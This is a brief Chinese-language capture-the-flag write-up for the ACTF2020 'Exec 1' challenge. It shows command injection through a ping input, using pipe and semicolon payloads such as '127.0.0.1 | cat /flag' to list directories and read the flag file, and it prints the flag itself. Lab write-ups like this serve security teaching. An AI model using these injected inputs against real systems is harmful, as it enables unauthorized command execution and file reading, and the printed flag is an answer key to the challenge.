[ACTF2020 新生赛]Exec 1

新生赛]Exec 1"/>

[ACTF2020 新生赛]Exec 1

题目环境：

是一个ping操作，ping个127.0.0.1试试
有回显结果

看起来有点像PWN的题，猜测通过列出目录文件，是否存在flag文件，并查看文件内容，并且存在两种方法解题，一种是管道符，一种是堆叠查询

第一种、管道符

列出目录文件
127.0.0.1 | ls

列出隐藏文件
127.0.0.1 | ls -a
发现存在上级目录

因此可以看出，此处命令执行并不是在root/根目录下进行的<br />列出/根目录下的目录文件
127.0.0.1 | ls /

存在flag，查看根目录下flag文件的内容
127.0.0.1 | cat /flag

得出flag：
**flag{ce0a3875-bc2a-49f9-b285-dccdf195531b}**

第二种、堆叠查询

列出当前目录文件；列出隐藏文件；列出根目录下的文件；查看根目录下flag文件的内容
127.0.0.1;ls;ls -a;ls /;cat /flag

得出flag：
**flag{ce0a3875-bc2a-49f9-b285-dccdf195531b}**
两种方法可以看出有明显的不同